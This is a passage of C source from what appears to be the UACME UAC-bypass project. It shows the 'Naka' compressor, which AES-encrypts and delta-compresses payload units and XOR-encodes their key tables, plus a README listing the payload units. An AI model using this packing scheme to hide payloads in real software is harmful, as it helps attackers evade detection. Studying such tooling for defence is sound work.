_cbHash;\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (hHashSha256) BCryptDestroyHash(hHashSha256);\n    if (hAlgSha256) BCryptCloseAlgorithmProvider(hAlgSha256, 0);\n\n    if (pbKeyObject) HeapFree(hHeap, 0, pbKeyObject);\n\n    if (bResult == FALSE) {\n\n        *pbHash = NULL;\n        *pcbHash = 0;\n\n        if (_pbHash) HeapFree(hHeap, 0, _pbHash);\n    }\n\n    return bResult;\n}\n\n/*\n* GenerateIV\n*\n* Purpose:\n*\n* Crypto-random generated initialization vector for AES encryption.\n*\n*/\nBOOL GenerateIV(\n    _In_ PBYTE pbIV,\n    _In_ DWORD cbIV\n)\n{\n    BOOL bResult = FALSE;\n    BCRYPT_ALG_HANDLE hAlgRng = NULL;\n\n    do {\n\n        if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(\n            &hAlgRng,\n            
BCRYPT_RNG_ALGORITHM,\n            NULL,\n            0)))\n        {\n            break;\n        }\n\n        bResult = (NT_SUCCESS(BCryptGenRandom(\n            hAlgRng,\n            pbIV,\n            cbIV,\n            0)));\n\n    } while (FALSE);\n\n    if (hAlgRng)\n        BCryptCloseAlgorithmProvider(hAlgRng, 0);\n\n    return bResult;\n}\n\n/*\n* DecryptBuffer\n*\n* Purpose:\n*\n* Decrypt AES encrypted buffer.\n*\n*/\nBOOL DecryptBuffer(\n    _In_    PBYTE  pbBuffer,\n    _In_    DWORD  cbBuffer,\n    _In_    PBYTE  pbIV,\n    _In_    PBYTE  pbSecret,\n    _In_    DWORD  cbSecret,\n    _Out_   PBYTE *pbDecryptedBuffer,\n    _Out_   PDWORD pcbDecryptedBuffer\n)\n{\n    BOOL                bResult = FALSE;\n    BCRYPT_ALG_HANDLE   hAlgAes = NULL;\n    BCRYPT_KEY_HANDLE   hKey = NULL;\n    HANDLE              heapCNG = NULL;\n    DWORD               cbCipherData, cbKeyObject, cbResult, cbBlockLen;\n    PBYTE               pbKeyObject = NULL, pbCipherData = NULL;\n\n    do {\n\n        heapCNG = HeapCreate(0, 0, 0);\n        if (heapCNG == NULL)\n            break;\n\n        if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(\n            &hAlgAes,\n            BCRYPT_AES_ALGORITHM,\n            NULL,\n            0)))\n        {\n            break;\n        }\n\n        cbKeyObject = 0;\n        cbResult = 0;\n\n        if (!NT_SUCCESS(BCryptGetProperty(\n            hAlgAes,\n            BCRYPT_OBJECT_LENGTH,\n            (PUCHAR)&cbKeyObject,\n            sizeof(DWORD),\n            &cbResult,\n            0)))\n        {\n            break;\n        }\n\n        pbKeyObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbKeyObject);\n        if (pbKeyObject == NULL)\n            break;\n\n        cbBlockLen = 0;\n\n        if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,\n            BCRYPT_BLOCK_LENGTH,\n            (PUCHAR)&cbBlockLen,\n            sizeof(DWORD),\n            &cbResult,\n            0)))\n        {\n            break;\n        }\n\n        if 
(cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)\n            break;\n\n        if (!NT_SUCCESS(BCryptGenerateSymmetricKey(\n            hAlgAes,\n            &hKey,\n            pbKeyObject,\n            cbKeyObject,\n            pbSecret,\n            cbSecret,\n            0)))\n        {\n            break;\n        }\n\n        cbCipherData = 0;\n        if (!NT_SUCCESS(BCryptDecrypt(\n            hKey,\n            pbBuffer,\n            cbBuffer,\n            NULL,\n            pbIV,\n            cbBlockLen,\n            NULL,\n            0,\n            &cbCipherData,\n            BCRYPT_BLOCK_PADDING)))\n        {\n            break;\n        }\n\n        pbCipherData = (PBYTE)HeapAlloc(\n            GetProcessHeap(),\n            HEAP_ZERO_MEMORY,\n            cbCipherData);\n\n        if (pbCipherData == NULL) {\n            break;\n        }\n\n        cbResult = 0;\n        if (!NT_SUCCESS(BCryptDecrypt(\n            hKey,\n            pbBuffer,\n            cbBuffer,\n            NULL,\n            pbIV,\n            cbBlockLen,\n            pbCipherData,\n            cbCipherData,\n            &cbResult,\n            BCRYPT_BLOCK_PADDING)))\n        {\n            break;\n        }\n\n        BCryptDestroyKey(hKey);\n        hKey = NULL;\n\n        *pbDecryptedBuffer = pbCipherData;\n        *pcbDecryptedBuffer = cbCipherData;\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (hKey != NULL)\n        BCryptDestroyKey(hKey);\n\n    if (hAlgAes != NULL)\n        BCryptCloseAlgorithmProvider(hAlgAes, 0);\n\n    if (heapCNG) HeapDestroy(heapCNG);\n\n    if (bResult == FALSE) {\n        if (pbCipherData) {\n            HeapFree(GetProcessHeap(), 0, pbCipherData);\n        }\n        *pbDecryptedBuffer = NULL;\n        *pcbDecryptedBuffer = 0;\n    }\n\n    return bResult;\n}\n\n/*\n* EncryptBuffer\n*\n* Purpose:\n*\n* Encrypt given buffer with AES-CBC.\n*\n*/\nBOOL EncryptBuffer(\n    _In_    PBYTE   pbBuffer,\n    _In_    DWORD   
cbBuffer,\n    _Inout_ PBYTE   pbIV,\n    _In_    PBYTE   pbSecret,\n    _In_    DWORD   cbSecret,\n    _Out_   PBYTE   *pbEncryptedBuffer,\n    _Out_   PDWORD  pcbEncryptedBuffer\n)\n{\n    BOOL                bResult = FALSE;\n    BCRYPT_ALG_HANDLE   hAlgAes = NULL;\n    BCRYPT_KEY_HANDLE   hKey = NULL;\n    HANDLE              heapCNG = NULL;\n    DWORD               cbCipherData, cbObject, cbResult, cbBlockLen;\n    PBYTE               pbObject, pbCipherData = NULL, _pbIV;\n\n    do {\n\n        heapCNG = HeapCreate(0, 0, 0);\n        if (heapCNG == NULL)\n            break;\n\n        if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(\n            &hAlgAes,\n            BCRYPT_AES_ALGORITHM,\n            NULL,\n            0)))\n        {\n            break;\n        }\n\n        cbObject = 0;\n        cbResult = 0;\n\n        if (!NT_SUCCESS(BCryptGetProperty(\n            hAlgAes,\n            BCRYPT_OBJECT_LENGTH,\n            (PUCHAR)&cbObject,\n            sizeof(DWORD),\n            &cbResult,\n            0)))\n        {\n            break;\n        }\n\n        pbObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbObject);\n        if (pbObject == NULL)\n            break;\n\n        cbBlockLen = 0;\n\n        if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,\n            BCRYPT_BLOCK_LENGTH,\n            (PUCHAR)&cbBlockLen,\n            sizeof(DWORD),\n            &cbResult,\n            0)))\n        {\n            break;\n        }\n\n        if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)\n            break;\n\n        if (!GenerateIV(pbIV, cbBlockLen))\n            break;\n\n        _pbIV = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbBlockLen);\n        if (_pbIV == NULL)\n            break;\n\n        RtlCopyMemory(_pbIV, pbIV, cbBlockLen);\n\n        if (!NT_SUCCESS(BCryptSetProperty( //-V542\n            hAlgAes,\n            BCRYPT_CHAINING_MODE,\n            (PUCHAR)BCRYPT_CHAIN_MODE_CBC,\n            sizeof(BCRYPT_CHAIN_MODE_CBC),\n            0)))\n     
   {\n            break;\n        }\n\n        if (!NT_SUCCESS(BCryptGenerateSymmetricKey(\n            hAlgAes,\n            &hKey,\n            pbObject,\n            cbObject,\n            pbSecret,\n            cbSecret,\n            0)))\n        {\n            break;\n        }\n\n        cbCipherData = 0;\n        if (!NT_SUCCESS(BCryptEncrypt(\n            hKey,\n            pbBuffer,\n            cbBuffer,\n            NULL,\n            _pbIV,\n            cbBlockLen,\n            NULL,\n            0,\n            &cbCipherData,\n            BCRYPT_BLOCK_PADDING)))\n        {\n            break;\n        }\n\n        pbCipherData = (PBYTE)HeapAlloc(\n            GetProcessHeap(),\n            HEAP_ZERO_MEMORY,\n            cbCipherData);\n\n        if (pbCipherData == NULL) {\n            break;\n        }\n\n        cbResult = 0;\n        if (!NT_SUCCESS(BCryptEncrypt(\n            hKey,\n            pbBuffer,\n            cbBuffer,\n            NULL,\n            _pbIV,\n            cbBlockLen,\n            pbCipherData,\n            cbCipherData,\n            &cbResult,\n            BCRYPT_BLOCK_PADDING)))\n        {\n            break;\n        }\n\n        BCryptDestroyKey(hKey);\n        hKey = NULL;\n\n        *pbEncryptedBuffer = pbCipherData;\n        *pcbEncryptedBuffer = cbCipherData;\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (hKey != NULL)\n        BCryptDestroyKey(hKey);\n\n    if (hAlgAes != NULL)\n        BCryptCloseAlgorithmProvider(hAlgAes, 0);\n\n    if (heapCNG) {\n        HeapDestroy(heapCNG);\n    }\n\n    if (bResult == FALSE) {\n        // HEAP_ZERO_MEMORY is an allocation flag and is not valid for HeapFree.\n        if (pbCipherData) HeapFree(GetProcessHeap(), 0, pbCipherData);\n        *pbEncryptedBuffer = NULL;\n        *pcbEncryptedBuffer = 0;\n    }\n\n    return bResult;\n}\n\n/*\n* supWriteBufferToFile\n*\n* Purpose:\n*\n* Create new file and write buffer to it.\n*\n*/\nBOOL supWriteBufferToFile(\n    _In_ LPWSTR lpFileName,\n    _In_ PVOID Buffer,\n    _In_ DWORD 
BufferSize\n)\n{\n    HANDLE hFile;\n    DWORD bytesIO;\n\n    if (Buffer == NULL || BufferSize == 0)\n        return FALSE;\n\n    hFile = CreateFileW(lpFileName,\n        GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);\n\n    if (hFile == INVALID_HANDLE_VALUE) {\n        return FALSE;\n    }\n\n    WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);\n    CloseHandle(hFile);\n\n    return (bytesIO == BufferSize);\n}\n\n/*\n* supReadBufferFromFile\n*\n* Purpose:\n*\n* Open existing file and read from it to buffer.\n*\n*/\nPVOID supReadBufferFromFile(\n    _In_ LPWSTR lpFileName,\n    _Out_ PLARGE_INTEGER FileSize\n)\n{\n    BOOL bSuccess = FALSE;\n    DWORD r;\n    PVOID FileData = NULL;\n    HANDLE hFile = INVALID_HANDLE_VALUE;\n    LARGE_INTEGER fileSize;\n\n    do {\n\n        hFile = CreateFile(\n            lpFileName,\n            GENERIC_READ,\n            FILE_SHARE_READ,\n            NULL,\n            OPEN_EXISTING,\n            0,\n            NULL);\n\n        if (hFile != INVALID_HANDLE_VALUE) {\n\n            fileSize.QuadPart = 0;\n            if (!GetFileSizeEx(hFile, &fileSize))\n                break;\n\n            if (fileSize.QuadPart == 0)\n                break;\n\n            FileData = HeapAlloc(\n                GetProcessHeap(),\n                HEAP_ZERO_MEMORY,\n                (SIZE_T)fileSize.LowPart);\n\n            if (FileData == NULL)\n                break;\n\n            if (!ReadFile(\n                hFile,\n                FileData,\n                fileSize.LowPart,\n                (LPDWORD)&r, NULL))\n            {\n                HeapFree(GetProcessHeap(), 0, FileData);\n                FileData = NULL;\n                break;\n            }\n\n            if (FileSize)\n                *FileSize = fileSize;\n\n            bSuccess = TRUE;\n        }\n\n    } while (FALSE);\n\n    if (!bSuccess) {\n        if (FileSize) {\n            fileSize.QuadPart = 0;\n            *FileSize = fileSize;\n        }\n    }\n\n    
if (hFile != INVALID_HANDLE_VALUE)\n        CloseHandle(hFile);\n\n    return FileData;\n}\n\n/*\n* IsValidContainerHeader\n*\n* Purpose:\n*\n* Basic sanity checks over container header.\n*\n*/\nBOOL IsValidContainerHeader(\n    _In_ PDCU_HEADER UnitHeader,\n    _In_ DWORD FileSize\n)\n{\n    DWORD HeaderCrc;\n\n    __try {\n        //\n        // File must be large enough to hold the header itself.\n        //\n        if (FileSize < sizeof(DCU_HEADER))\n            return FALSE;\n\n        if ((UnitHeader->Magic != UACME_CONTAINER_PACKED_DATA) &&   //Naka\n            (UnitHeader->Magic != UACME_CONTAINER_PACKED_UNIT) &&   //Naka\n            (UnitHeader->Magic != UACME_CONTAINER_PACKED_CODE) &&   //Kuma\n            (UnitHeader->Magic != UACME_CONTAINER_PACKED_KEYS))     //Kuma\n        {\n            return FALSE;\n        }\n\n        //\n        // Note that IV has different meaning in Kuma containers.\n        //\n\n        HeaderCrc = UnitHeader->HeaderCrc;\n        UnitHeader->HeaderCrc = 0;\n        if (RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER)) != HeaderCrc)\n            return FALSE;\n\n        if ((UnitHeader->cbData == 0) ||\n            (UnitHeader->cbDeltaSize == 0))\n            return FALSE;\n        //\n        // Data follows the header, so it cannot exceed the remaining bytes.\n        //\n        if (UnitHeader->cbData > FileSize - sizeof(DCU_HEADER))\n            return FALSE;\n        if (UnitHeader->cbDeltaSize > FileSize)\n            return FALSE;\n        if (UnitHeader->cbDeltaSize > UnitHeader->cbData)\n            return FALSE;\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        return FALSE;\n    }\n\n    return TRUE;\n}\n\n/*\n* DecompressContainerUnit\n*\n* Purpose:\n*\n* Decompress given container file.\n*\n*/\nvoid DecompressContainerUnit(\n    _In_ LPWSTR lpInputFile,\n    _In_ LPWSTR lpKeyFile\n)\n{\n    PUCHAR FileData = NULL;\n    LPWSTR NewName = NULL;\n    SIZE_T sz = 0;\n    LARGE_INTEGER FileSize, KeyFileSize;\n\n    PDCU_HEADER UnitHeader;\n\n    PBYTE pbDecryptedBuffer = NULL;\n    DWORD cbDecryptedBuffer = 0;\n\n    DELTA_INPUT diDelta, diSource;\n    DELTA_OUTPUT doOutput;\n\n    HANDLE hHeap = GetProcessHeap();\n\n    PBYTE pbKeyBlob = NULL;\n\n    PBYTE DataPtr;\n\n    do {\n    
    sz = (1 + _strlen(lpInputFile)) * sizeof(WCHAR);\n        NewName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz);\n        if (NewName == NULL)\n            break;\n\n        FileSize.QuadPart = 0;\n        FileData = (PUCHAR)supReadBufferFromFile(lpInputFile, &FileSize);\n        if ((FileData == NULL) || (FileSize.QuadPart == 0))\n            break;\n\n        KeyFileSize.QuadPart = 0;\n        pbKeyBlob = (PBYTE)supReadBufferFromFile(lpKeyFile, &KeyFileSize);\n        if ((pbKeyBlob == NULL) || (KeyFileSize.QuadPart == 0))\n            break;\n\n        UnitHeader = (PDCU_HEADER)FileData;\n\n        if (!IsValidContainerHeader(UnitHeader, FileSize.LowPart))\n            break;\n\n        DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER);\n\n        if (!DecryptBuffer(\n            (PBYTE)DataPtr,\n            UnitHeader->cbData,\n            UnitHeader->bIV,\n            (PBYTE)pbKeyBlob,\n            KeyFileSize.LowPart,\n            &pbDecryptedBuffer,\n            &cbDecryptedBuffer))\n        {\n            break;\n        }\n\n        if (cbDecryptedBuffer > FileSize.LowPart)\n            break;\n\n        RtlSecureZeroMemory(&diSource, sizeof(DELTA_INPUT));\n        RtlSecureZeroMemory(&diDelta, sizeof(DELTA_INPUT));\n        RtlSecureZeroMemory(&doOutput, sizeof(DELTA_OUTPUT));\n\n        diDelta.Editable = FALSE;\n        diDelta.lpcStart = pbDecryptedBuffer;\n        diDelta.uSize = UnitHeader->cbDeltaSize;\n\n        if (ApplyDeltaB(DELTA_FILE_TYPE_RAW, diSource, diDelta, &doOutput)) {\n\n            if (_filename_noext(NewName, lpInputFile)) {\n                _strcat(NewName, TEXT(\".out\"));\n                supWriteBufferToFile(NewName, doOutput.lpStart, (DWORD)doOutput.uSize);\n            }\n\n            DeltaFree(doOutput.lpStart);\n        }\n\n    } while (FALSE);\n\n    if (pbDecryptedBuffer != NULL)\n        HeapFree(hHeap, 0, pbDecryptedBuffer);\n    if (NewName != NULL)\n        HeapFree(hHeap, 0, NewName);\n    if (FileData != 
NULL)\n        HeapFree(hHeap, 0, FileData);\n    if (pbKeyBlob != NULL)\n        HeapFree(hHeap, 0, pbKeyBlob);\n\n}\n\n/*\n* CreateContainerPackedUnit\n*\n* Purpose:\n*\n* Create container with compressed file inside.\n*\n*/\nvoid CreateContainerPackedUnit(\n    _In_ LPWSTR lpInputFile\n)\n{\n    PUCHAR FileData = NULL;\n    HANDLE hHeap = GetProcessHeap();\n    LPWSTR NewName = NULL;\n    SIZE_T sz = 0;\n    LARGE_INTEGER FileSize;\n\n    DELTA_INPUT d_in, d_target, s_op, t_op, g_op;\n    DELTA_OUTPUT d_out;\n\n    PBYTE pbHash = NULL, pbEncryptedBuffer = NULL;\n    DWORD cbHash = 0, cbEncryptedBuffer = 0;\n\n    PDCU_HEADER UnitHeader;\n    PIMAGE_NT_HEADERS NtHeaders;\n    PIMAGE_FILE_HEADER fheader;\n\n    PVOID hashSource;\n    DWORD hashSize, Magic;\n\n    PBYTE DataPtr;\n\n#ifdef _DEBUG\n    LPWSTR KeyName = NULL;\n#endif\n\n    BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH];\n\n    do {\n        RtlSecureZeroMemory(&d_out, sizeof(DELTA_OUTPUT));\n\n        sz = (1 + _strlen(lpInputFile)) * sizeof(WCHAR);\n        NewName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz);\n        if (NewName == NULL)\n            break;\n\n#ifdef _DEBUG\n        KeyName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz);\n        if (KeyName == NULL)\n            break;\n#endif\n\n        FileSize.QuadPart = 0;\n        FileData = (PUCHAR)supReadBufferFromFile(lpInputFile, &FileSize);\n        if ((FileData == NULL) || (FileSize.QuadPart == 0))\n            break;\n\n        NtHeaders = RtlImageNtHeader(FileData);\n        if (NtHeaders == NULL) {\n            //\n            // Not an image file, use whole file SHA256 hash as key.\n            //\n            hashSource = FileData;\n            hashSize = FileSize.LowPart;\n\n            Magic = UACME_CONTAINER_PACKED_DATA;\n        }\n        else {\n\n            //\n            // Image file, create SHA256 hash from IMAGE_FILE_HEADER.\n            //\n            fheader = &NtHeaders->FileHeader;\n            hashSource = fheader;\n  
          hashSize = sizeof(IMAGE_FILE_HEADER);\n\n            Magic = UACME_CONTAINER_PACKED_UNIT;\n        }\n\n        if (!CreateSha256HashForBuffer((PBYTE)hashSource, hashSize, &pbHash, &cbHash))\n            break;\n\n        if (cbHash > 32)\n            break;\n\n        if (_filename_noext(NewName, lpInputFile)) {\n            _strcat(NewName, TEXT(\".key\"));\n            supWriteBufferToFile(NewName, pbHash, (DWORD)cbHash);\n        }\n\n        //\n        // Pack file to buffer.\n        //\n\n        RtlSecureZeroMemory(&d_in, sizeof(DELTA_INPUT));\n        d_target.lpcStart = FileData;\n        d_target.uSize = FileSize.LowPart;\n        d_target.Editable = FALSE;\n\n        RtlSecureZeroMemory(&s_op, sizeof(DELTA_INPUT));\n        RtlSecureZeroMemory(&t_op, sizeof(DELTA_INPUT));\n        RtlSecureZeroMemory(&g_op, sizeof(DELTA_INPUT));\n\n        if (!CreateDeltaB(DELTA_FILE_TYPE_RAW,\n            DELTA_FLAG_NONE,\n            DELTA_FLAG_NONE,\n            d_in,\n            d_target,\n            s_op,\n            t_op,\n            g_op,\n            NULL,\n            0,\n            &d_out))\n        {\n            break;\n        }\n\n        //\n        //  Encrypt buffer with AES-CBC using SHA256 hash as key.\n        // \n\n        RtlSecureZeroMemory(&bIV, sizeof(bIV));\n\n        if (!EncryptBuffer(\n            (PBYTE)d_out.lpStart,\n            (DWORD)d_out.uSize,\n            (PBYTE)&bIV,\n            pbHash,\n            cbHash,\n            &pbEncryptedBuffer,\n            &cbEncryptedBuffer))\n        {\n            break;\n        }\n\n        DeltaFree(d_out.lpStart);\n        d_out.lpStart = NULL;\n\n        //\n        // Build final package and save it to disk.\n        //\n\n        sz = sizeof(DCU_HEADER) + cbEncryptedBuffer;\n        UnitHeader = (PDCU_HEADER)HeapAlloc(\n            hHeap,\n            HEAP_ZERO_MEMORY,\n            sz);\n\n        if (UnitHeader) {\n\n            UnitHeader->Magic = Magic;\n            
UnitHeader->cbData = cbEncryptedBuffer;\n            UnitHeader->cbDeltaSize = (DWORD)d_out.uSize; //original compressed delta size\n\n            RtlCopyMemory(UnitHeader->bIV, bIV, DCU_IV_MAX_BLOCK_LENGTH);\n\n            UnitHeader->HeaderCrc = RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER));\n\n            DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER);\n            RtlCopyMemory(DataPtr, pbEncryptedBuffer, cbEncryptedBuffer);\n\n            if (_filename_noext(NewName, lpInputFile)) {\n                _strcat(NewName, TEXT(\".cd\"));\n                supWriteBufferToFile(NewName, UnitHeader, (DWORD)sz);\n            }\n            HeapFree(GetProcessHeap(), 0, UnitHeader);\n        }\n\n    } while (FALSE);\n\n    if (d_out.lpStart)\n        DeltaFree(d_out.lpStart);\n\n    if (pbHash)\n        HeapFree(hHeap, 0, pbHash);\n\n    if (pbEncryptedBuffer)\n        HeapFree(hHeap, 0, pbEncryptedBuffer);\n\n#ifdef _DEBUG\n    if (_filename_noext(NewName, lpInputFile)) {\n        _strcat(NewName, TEXT(\".cd\"));\n        if (_filename_noext(KeyName, lpInputFile)) {\n            _strcat(KeyName, TEXT(\".key\"));\n            DecompressContainerUnit(NewName, KeyName);\n        }\n    }\n\n    if (KeyName != NULL)\n        HeapFree(hHeap, 0, KeyName);\n#endif\n    if (NewName != NULL)\n        HeapFree(hHeap, 0, NewName);\n\n    if (FileData != NULL)\n        HeapFree(hHeap, 0, FileData);\n}\n\n#define UACME_KEY_SIZE      32\n#define UACME_MAX_UNITS     12 //set actual number from github version\n#define AKAGI_XOR_KEY       'naka'\n\ntypedef struct _DCK_HEADER {\n    DWORD Id;\n    BYTE Data[UACME_KEY_SIZE];\n} DCK_HEADER, *PDCK_HEADER;\n\n/*\n* EncodeBuffer\n*\n* Purpose:\n*\n* Decrypt/Encrypt given buffer.\n*\n*/\nVOID EncodeBuffer(\n    PVOID Buffer,\n    ULONG BufferSize\n)\n{\n    ULONG k, c;\n    PUCHAR ptr;\n\n    if ((Buffer == NULL) || (BufferSize == 0))\n        return;\n\n    k = AKAGI_XOR_KEY;\n    c = BufferSize;\n    ptr = (PUCHAR)Buffer;\n\n    do 
{\n        *ptr ^= k;\n        k = _rotl(k, 1);\n        ptr++;\n        --c;\n    } while (c != 0);\n}\n\n//\n// Keep in sync with Akagi\n//\n#define IDR_FUBUKI64 100\n#define IDR_IKAZUCHI64 102\n#define IDR_AKATSUKI64 103\n#define IDR_KAMIKAZE64 104\n\n#define IDR_FUBUKI32 200\n#define IDR_IKAZUCHI32 202\n#define IDR_KAMIKAZE 203\n\nBOOL ProcessUnit(\n    _In_ PWSTR UnitKeyName,\n    _In_ ULONG UnitID,\n    _In_ PDCK_HEADER UnitHeader)\n{\n    PWCHAR pBuffer;\n    LARGE_INTEGER fs;\n\n    pBuffer = (PWCHAR)supReadBufferFromFile(UnitKeyName, &fs);\n    if (pBuffer) {\n        if (fs.LowPart != UACME_KEY_SIZE) {\n\n            MessageBox(\n                GetDesktopWindow(),\n                L\"Unexpected key size.\",\n                NULL,\n                MB_ICONERROR);\n\n            // Release the file buffer on the error path as well.\n            HeapFree(GetProcessHeap(), 0, pBuffer);\n            return FALSE;\n        }\n\n        UnitHeader->Id = UnitID;\n        RtlCopyMemory(UnitHeader->Data, pBuffer, fs.LowPart);\n        HeapFree(GetProcessHeap(), 0, pBuffer);\n    }\n    else {\n\n        MessageBox(\n            GetDesktopWindow(),\n            L\"File read error, memory not allocated.\",\n            NULL,\n            MB_ICONERROR);\n\n        return FALSE;\n    }\n    return TRUE;\n}\n\nVOID CreateSecretTables(VOID)\n{\n    INT c = 0;\n    SIZE_T l = 0;\n    DCK_HEADER S[UACME_MAX_UNITS];\n\n    WCHAR szFileName[MAX_PATH * 2];\n\n    RtlSecureZeroMemory(szFileName, sizeof(szFileName));\n\n#ifdef _DEBUG\n    _strcpy(szFileName, L\"Z:\\\\HE\\\\UACME\\\\Compress\");\n#else\n    GetCurrentDirectory(MAX_PATH, szFileName);\n#endif\n\n    _strcat(szFileName, L\"\\\\\");\n\n    l = _strlen(szFileName);\n    szFileName[l] = 0;\n\n    //\n    // Build secrets64\n    //\n    c = 0;\n    RtlSecureZeroMemory(S, sizeof(S));\n\n    _strcat(&szFileName[l], L\"Akatsuki64.key\");\n    if (ProcessUnit(szFileName, IDR_AKATSUKI64, &S[c]))\n        c++;\n\n    szFileName[l] = 0;\n    _strcat(&szFileName[l], L\"Fubuki64.key\");\n    if (ProcessUnit(szFileName, IDR_FUBUKI64, &S[c]))\n    
    c++;\n\n    szFileName[l] = 0;\n    _strcat(&szFileName[l], L\"Fubuki32.key\");\n    if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c]))\n        c++;\n\n    szFileName[l] = 0;\n    _strcat(&szFileName[l], L\"Kamikaze.key\");\n    if (ProcessUnit(szFileName, IDR_KAMIKAZE64, &S[c]))\n        c++;\n\n    EncodeBuffer(S, c * sizeof(DCK_HEADER));\n    szFileName[l] = 0;\n    _strcat(&szFileName[l], L\"secrets64.bin\");\n    supWriteBufferToFile(szFileName, S, c * sizeof(DCK_HEADER));\n\n    //\n    // Build secrets32\n    //\n    c = 0;\n    RtlSecureZeroMemory(S, sizeof(S));\n    szFileName[l] = 0;\n    _strcat(&szFileName[l], L\"Fubuki32.key\");\n    if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c]))\n        c++;\n\n    szFileName[l] = 0;\n    _strcat(&szFileName[l], L\"Kamikaze.key\");\n    if (ProcessUnit(szFileName, IDR_KAMIKAZE, &S[c]))\n        c++;\n\n    EncodeBuffer(S, c * sizeof(DCK_HEADER));\n    szFileName[l] = 0;\n    _strcat(&szFileName[l], L\"secrets32.bin\");\n    supWriteBufferToFile(szFileName, S, c * sizeof(DCK_HEADER));\n}\n\n/*\n* main\n*\n* Purpose:\n*\n* Program entry point.\n*\n*/\nvoid main()\n{\n    LPWSTR  FirstParam = NULL;\n    LPWSTR *szArglist;\n    INT     nArgs = 0;\n\n    szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs);\n    if (szArglist) {\n\n        if (nArgs > 1) {\n            FirstParam = szArglist[1];\n            if (FirstParam) {\n                if (_strcmpi(FirstParam, L\"--stable\") == 0) {\n                    CreateSecretTables();\n                }\n                else {\n                    CreateContainerPackedUnit(FirstParam);\n                }\n            }\n        }\n        else {\n            MessageBox(\n                GetDesktopWindow(), \n                TEXT(\"Input file not specified\"), \n                TEXT(\"Naka\"), \n                MB_ICONINFORMATION);\n        }\n\n        LocalFree(szArglist);\n    }\n\n    ExitProcess(0);\n}\n"
  },
  {
    "path": "Source/Naka/naka.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2018 - 2021\n*\n*  TITLE:       NAKA.H\n*\n*  VERSION:     3.03\n*\n*  DATE:        15 July 2021\n*\n*  Common header file for Naka.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#include \"shared\\libinc.h\"\n\n#pragma comment(lib, \"msdelta.lib\")\n#pragma comment(lib, \"Bcrypt.lib\")\n\n//disable nonmeaningful warnings.\n#pragma warning(disable: 4005) // macro redefinition\n#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s\n#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n#pragma warning(disable: 6102) // Using %s from failed function call at line %u\n#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER\n\n#include <Windows.h>\n#include <ntstatus.h>\n#include <msdelta.h>\n#include <Bcrypt.h>\n#include \"shared\\ntos\\ntos.h\"\n#include \"shared\\minirtl.h\"\n#include \"shared\\cmdline.h\"\n#include \"shared\\_filename.h\"\n\n#define UACME_CONTAINER_PACKED_UNIT 'UPCU' //Naka handling\n#define UACME_CONTAINER_PACKED_DATA 'DPCU' //Naka handling\n#define UACME_CONTAINER_PACKED_CODE 'CPCU' //Kuma handling\n#define UACME_CONTAINER_PACKED_KEYS 'KPCU' //Kuma handling\n\n//Initialization vector max bytes\n#define DCU_IV_MAX_BLOCK_LENGTH 16\n\ntypedef struct _DCU_HEADER {\n    DWORD Magic;\n    DWORD cbData;\n    DWORD cbDeltaSize;\n    DWORD HeaderCrc;\n    BYTE 
bIV[DCU_IV_MAX_BLOCK_LENGTH];\n    //PBYTE pbData[1];     /* not a member of the structure */\n} DCU_HEADER, *PDCU_HEADER;\n"
  },
  {
    "path": "Source/README.md",
    "content": "## Units\n\n- Akagi, x64/x86-32 main executable file, contain payload/data units.\n- Akatsuki, x64 payload, WOW64 logger.\n- Fubuki, x64/x86-32 payload, general purpose.\n- Kamikaze, data, MMC snap-in.\n- Naka, x64/x86-32 compressor for other payload/data units.\n- Yuubari, x64 UAC info data dumper.\n\n## Other\n\n- Shared, contain headers and source code shared between several projects.\n"
  },
  {
    "path": "Source/Shared/_filename.c",
